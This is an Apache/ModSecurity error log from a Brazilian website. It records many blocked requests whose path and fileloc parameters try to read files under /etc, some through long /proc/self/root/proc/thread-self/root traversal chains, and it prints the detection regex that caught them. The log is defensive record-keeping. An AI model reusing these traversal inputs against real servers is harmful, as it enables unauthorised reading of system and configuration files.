[Fri Mar 20 10:58:33.494965 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:55536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SieoXxyEfFpUF8f-mNQAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:58:41.355329 2026] [:error] [pid 11167:tid 140411691570944] [client 57.141.18.13:34706] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1SkfHIg5MgXLBnicMcCAAAAcY"]
[Fri Mar 20 10:58:47.423112 2026] [:error] [pid 9818:tid 140411699963648] [client 57.141.18.39:35120] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Sl11pVZ5mVmJwsFNVeQAAAEU"]
[Fri Mar 20 10:58:49.443438 2026] [mime_magic:error] [pid 11642:tid 140411616036608] (70014)End of file found: [client 57.141.18.114:35056] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:58:53.308335 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.77:35526] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1SneoXxyEfFpUF8f-mQAAAAUM"]
[Fri Mar 20 10:58:54.963932 2026] [:error] [pid 7893:tid 140411641214720] [client 74.7.241.31:42808] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1SnhCii7xarUs8iHaQewAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:58:54.970430 2026] [:error] [pid 7235:tid 140411683178240] [client 216.73.216.191:35550] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.keys"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1SnvqxLDW4GITHUkQP6gAAAQc"]
[Fri Mar 20 10:58:58.791430 2026] [:error] [pid 11167:tid 140411607643904] [client 216.73.216.191:35862] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1SovHIg5MgXLBnicMcIwAAAdA"]
[Fri Mar 20 10:59:10.358257 2026] [:error] [pid 9818:tid 140411540502272] [client 74.7.241.31:51290] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Srl1pVZ5mVmJwsFNVmgAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:59:44.122600 2026] [:error] [pid 10189:tid 140411548894976] [client 57.141.18.56:37504] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1S0DJ3M9BSuKP7CAZLnAAAAJc"]
[Fri Mar 20 10:59:44.604397 2026] [:error] [pid 9818:tid 140411565680384] [client 57.141.18.45:37554] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1S0F1pVZ5mVmJwsFNVtQAAAFU"]
[Fri Mar 20 10:59:44.873892 2026] [:error] [pid 7235:tid 140411716749056] [client 57.141.18.118:37632] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1S0PqxLDW4GITHUkQQFAAAAQM"]
[Fri Mar 20 10:59:47.293087 2026] [:error] [pid 26799:tid 140411582465792] [client 216.73.216.191:37500] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1S09a6ubjKNq_cu4YA2QAAA1M"]
[Fri Mar 20 10:59:53.120454 2026] [:error] [pid 11642:tid 140411666392832] [client 57.141.18.114:38158] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1S17ninkcc-iUj5AqDygAAA4k"]
[Fri Mar 20 10:59:55.853498 2026] [:error] [pid 11167:tid 140411548894976] [client 216.73.216.191:38176] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1S2vHIg5MgXLBnicMcWQAAAdc"]
[Fri Mar 20 11:00:12.469778 2026] [mime_magic:error] [pid 7235:tid 140411649607424] (70014)End of file found: [client 216.73.216.191:38812] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:00:13.047482 2026] [:error] [pid 11167:tid 140411699963648] [client 216.73.216.191:38554] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1S7fHIg5MgXLBnicMcawAAAcU"]
[Fri Mar 20 11:00:18.471063 2026] [:error] [pid 7235:tid 140411741927168] [client 216.73.216.191:39358] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1S8vqxLDW4GITHUkQQNgAAAQA"]
[Fri Mar 20 11:00:20.448477 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.241.31:38360] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1S9DJ3M9BSuKP7CAZL2QAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:00:22.746938 2026] [mime_magic:error] [pid 31215:tid 140411674785536] (70014)End of file found: [client 216.73.216.191:39604] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:00:29.174733 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:47326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1S_da6ubjKNq_cu4YA_wAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:00:30.230762 2026] [:error] [pid 26799:tid 140411574073088] [client 57.141.18.101:39844] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1S_ta6ubjKNq_cu4YBAgAAA1Q"]
[Fri Mar 20 11:00:35.821769 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:39284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TA-oXxyEfFpUF8f-mswAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:00:47.113785 2026] [mime_magic:error] [pid 11642:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:40584] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:00:47.363472 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:42824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TD9a6ubjKNq_cu4YBEwAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 11:00:49.064337 2026] [:error] [pid 26799:tid 140411658000128] [client 216.73.216.191:40638] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1TENa6ubjKNq_cu4YBFAAAA0o"]
[Fri Mar 20 11:00:49.631884 2026] [:error] [pid 31215:tid 140411658000128] [client 57.141.18.94:40698] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1TEQF0L0L-SsrnPo6QAgAAAso"]
[Fri Mar 20 11:00:50.537167 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:42252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TEta6ubjKNq_cu4YBGwAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:00:52.591594 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.241.31:39298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TE7ninkcc-iUj5AqEBwAAA5A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:00:52.593939 2026] [access_compat:error] [pid 10189:tid 140411683178240] [client 142.248.80.157:55469] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/theme-install.php, referer: https://www.google.com/
